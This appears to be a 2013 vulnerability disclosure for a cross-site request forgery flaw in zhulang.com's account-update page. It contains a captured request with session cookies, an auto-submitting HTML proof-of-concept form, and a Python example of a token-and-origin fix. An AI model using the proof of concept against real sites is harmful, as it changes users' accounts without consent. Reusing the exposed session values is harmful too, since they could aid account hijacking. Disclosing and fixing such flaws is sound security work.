2013-09-17: Details have been reported to the vendor and are awaiting the vendor's handling. 2013-09-22: The vendor has actively ignored the vulnerability; details are disclosed to the public.
http://www.zhulang.com/w_user_account.php Here it is, see the screenshot. - -
POST /w_user_account.php HTTP/1.1
Host: www.zhulang.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.zhulang.com/w_user_account.php
Cookie: Hm_lvt_c4d45d45e1a473a3e43c8699766169ee=1379411573; Hm_lpvt_c4d45d45e1a473a3e43c8699766169ee=1379412666; bdshare_firstime=1379411573523; PHPSESSID=154a3b6ce4053e9b805f67f86c8464df; user_name201007=189837992; user_name201306=189837992; user_nick_name201306=189837992; user_name201007_1=10800; user_name201007_2=%7B%24user_name%7D%3A%3A189837992%7C%7C%7B%24user_nick_name%7D%3A%3A189837992%7C%7C%7B%24usertypename%7D%3A%3A%E6%99%AE%E9%80%9A%E4%BC%9A%E5%91%98%7C%7C%7B%24msgNoReadNumHc%7D%3A%3A
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 157

action=register&nickName=%E6%B5%8B%E8%AF%95&signature=&userPasswordOld=&userPassword=&userRepassword=&button=%C2%A0%C2%A0%E6%8F%90%C2%A0%E4%BA%A4%C2%A0%C2%A0
Constructed PoC:
<html>
<body>
<!-- Replays the captured account-update POST from a third-party page; no anti-CSRF token is required by the endpoint -->
<form id="wooyun" name="wooyun" action="http://www.zhulang.com/w_user_account.php" method="POST">
<input type="text" name="action" value="register" />
<input type="text" name="nickName" value="hack~" />
<input type="text" name="signature" value="" />
<input type="text" name="userPasswordOld" value="" />
<input type="text" name="userPassword" value="" />
<input type="text" name="userRepassword" value="" />
<input type="text" name="button" value="%C2%A0%C2%A0%E6%8F%90%C2%A0%E4%BA%A4%C2%A0%C2%A0" />
<input type="submit" value="submit">
</form>
<!-- The form is named "wooyun", so it is submitted under that name (the original referenced a non-existent "document.long") -->
<script>document.wooyun.submit();</script>
</body>
</html>
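The root cause shown above is that w_user_account.php applies a state change on any authenticated POST, whatever page the form came from. The following is an added example of the server-side fix, not the site's real code: a hypothetical handler that only accepts the update when the body carries a per-session synchronizer token (assumed field name `csrf_token`) and, as defence in depth, the Origin/Referer is the site's own. The PoC body and the sample headers are constructed from the captured request.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlparse

# Hypothetical server-side fix for an endpoint like w_user_account.php (not the
# site's real code): the account change is applied only when the POST body
# carries the per-session token that the site's own form page issued.
SITE_ORIGIN = ("http", "www.zhulang.com")

def issue_csrf_token(session):
    """Create (or reuse) a random token bound to this session; the form embeds it."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]

def handle_account_update(session, body, headers):
    """Return ("ok", fields) when the request is accepted, else ("rejected", why).
    body: raw application/x-www-form-urlencoded POST body; headers: request headers."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    hdr = {k.lower(): v for k, v in headers.items()}
    # Synchronizer token: must match the session-bound value (constant-time compare).
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "rejected", "missing or mismatched csrf_token"
    # Defence in depth: a form auto-submitted from another page carries that
    # page's Origin/Referer, so anything but the site's own origin is refused.
    src = urlparse(hdr.get("origin") or hdr.get("referer", ""))
    if (src.scheme, src.netloc) != SITE_ORIGIN:
        return "rejected", "cross-site request from %r" % src.netloc
    if form.get("action") != "register":
        return "rejected", "unsupported action"
    return "ok", {"nickName": form.get("nickName", ""), "signature": form.get("signature", "")}

# Constructed sample: the PoC form above as the server would receive it, i.e.
# the same fields as the captured request but no token and a foreign Referer.
POC_BODY = ("action=register&nickName=hack~&signature=&userPasswordOld="
            "&userPassword=&userRepassword=&button=%C2%A0")
POC_HEADERS = {"Host": "www.zhulang.com", "Referer": "http://other-site.example/poc.html"}

def demo():
    """Run the PoC body and a legitimate same-site submission through the handler."""
    session = {}
    token = issue_csrf_token(session)  # what the real form page would embed
    blocked = handle_account_update(session, POC_BODY, POC_HEADERS)
    legit_body = POC_BODY.replace("hack~", "alice") + "&" + urlencode({"csrf_token": token})
    legit_headers = {"Referer": "http://www.zhulang.com/w_user_account.php"}
    accepted = handle_account_update(session, legit_body, legit_headers)
    return blocked, accepted
```

`demo()` returns the PoC result (rejected for a missing token) alongside the same-site submission carrying the issued token (accepted).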
Any gift? If so, I'll keep going - -
Severity: No impact, vendor ignored
Ignored at: 2013-09-22 18:33
None